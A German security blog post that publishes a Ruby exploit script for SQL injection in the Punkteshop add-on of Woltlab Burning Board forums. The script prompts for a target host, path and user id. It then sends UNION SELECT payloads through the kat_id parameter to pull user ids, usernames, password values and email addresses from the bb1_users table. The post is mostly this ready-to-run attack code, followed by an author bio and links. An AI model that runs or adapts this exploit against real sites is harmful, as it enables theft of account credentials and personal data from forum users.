[Exploit]Woltlab Burning Board Punkteshop Hack SQL Injection Exploit

Veröffentlicht von ¥akuza112am 01. Januar 2012in : VulnerabilitiesTags: Chomp, Demo, Hack, Host Name, Kat, Path, Php, Quot Quot, Ruby, Security Project, Sql Injection, Usr Bin, VulnerabilityKeine Kommentare

[php]

#!/usr/bin/ruby
#Discovered and vulnerability by Easy Laster
print "
############################################################
# 4004-Security-Project #
############################################################
# Woltlab Burning Board Punkteshop Hack SQL Injection #
# Exploit #
# Using Host+Path+id #
# www.demo.de /wbb/ 1 #
# Easy Laster #
############################################################
"
require ’net/http‘
block = "#########################################################"
print ""+ block +""
print "\nEnter host name (site.com)->"
host=gets.chomp
print ""+ block +""
print "\nEnter script path (/wbb/)->"
path=gets.chomp
print ""+ block +""
print "\nEnter the id (id)->"
userid=gets.chomp
print ""+ block +""
begin
dir = "punkteshop.php?kat_id=’+UNION+SELECT+1,2,3,4,concat(0x23,0"+
"x23,0x23,0x23,0x23,userid,0x23,0x23,0x23,0x23,0x23),6,7,"+
"8,9,10,11,12,13,14,15+from+bb1_users+where+userid="+userid+"–+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nUserid -> "+(/#####(.+)#####/).match(resp.body)[1]

dir = "punkteshop.php?kat_id=’+UNION+SELECT+1,2,3,4,concat(0x23,0"+
"x23,0x23,0x23,0x23,username,0x23,0x23,0x23,0x23,0x23),6,7,"+
"8,9,10,11,12,13,14,15+from+bb1_users+where+userid="+userid+"–+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nUsername -> "+(/#####(.+)#####/).match(resp.body)[1]

dir = "punkteshop.php?kat_id=’+UNION+SELECT+1,2,3,4,concat(0x23,0"+
"x23,0x23,0x23,0x23,password,0x23,0x23,0x23,0x23,0x23),6,7,"+
"8,9,10,11,12,13,14,15+from+bb1_users+where+userid="+userid+"–+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nUPassword -> "+(/#####(.+)#####/).match(resp.body)[1]

dir = "punkteshop.php?kat_id=’+UNION+SELECT+1,2,3,4,concat(0x23,0"+
"x23,0x23,0x23,0x23,email,0x23,0x23,0x23,0x23,0x23),6,7,"+
"8,9,10,11,12,13,14,15+from+bb1_users+where+userid="+userid+"–+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nEmail -> "+(/#####(.+)#####/).match(resp.body)[1]

print "\n#########################################################"
rescue
print "\nExploit failed or hackblock"
end
Mit Zitat antworten

[/php]

¥akuza112

Ich beschäftige mich größtenteils mit aktuellen Nachrichten bzgl. Hacking, Cracking & Security, sowie Globalen und Scene News. Wir haben uns nicht unterkriegen lassen und sind trotz vieler Drohungen, Ddos Attacken usw. seit August 2010 online. Die Privatsphäre unserer Leser liegt uns sehr am Herzen, weswegen wir keinerlei Nutzerdaten (in Form von IP Adressen) unserer Nutzer in der Datenbank speichern. Falls Sie Fragen, Anregungen oder Kritik haben, schicken Sie mir doch einfach eine Nachricht. Weitere Kontaktmöglichkeiten finden Sie auf yakuza112.org.

Einen guten Rutsch ins neue Jahr

CrackMe’s

Über den Autor

¥akuza112

Ähnliche Artikel

Hinterlasse eine Antwort Breche Antwort ab

[Exploit]Woltlab Burning Board Punkteshop Hack SQL Injection Exploit

Einen guten Rutsch ins neue Jahr

CrackMe’s

Über den Autor

¥akuza112

Ähnliche Artikel

Einfacher Webseitenschutz gegen Scanprogramme von Angreifern

Schutz durch PDO gegen SQL-Injections

MySQL – für Anfänger #6 – Daten löschen

Hinterlasse eine Antwort Breche Antwort ab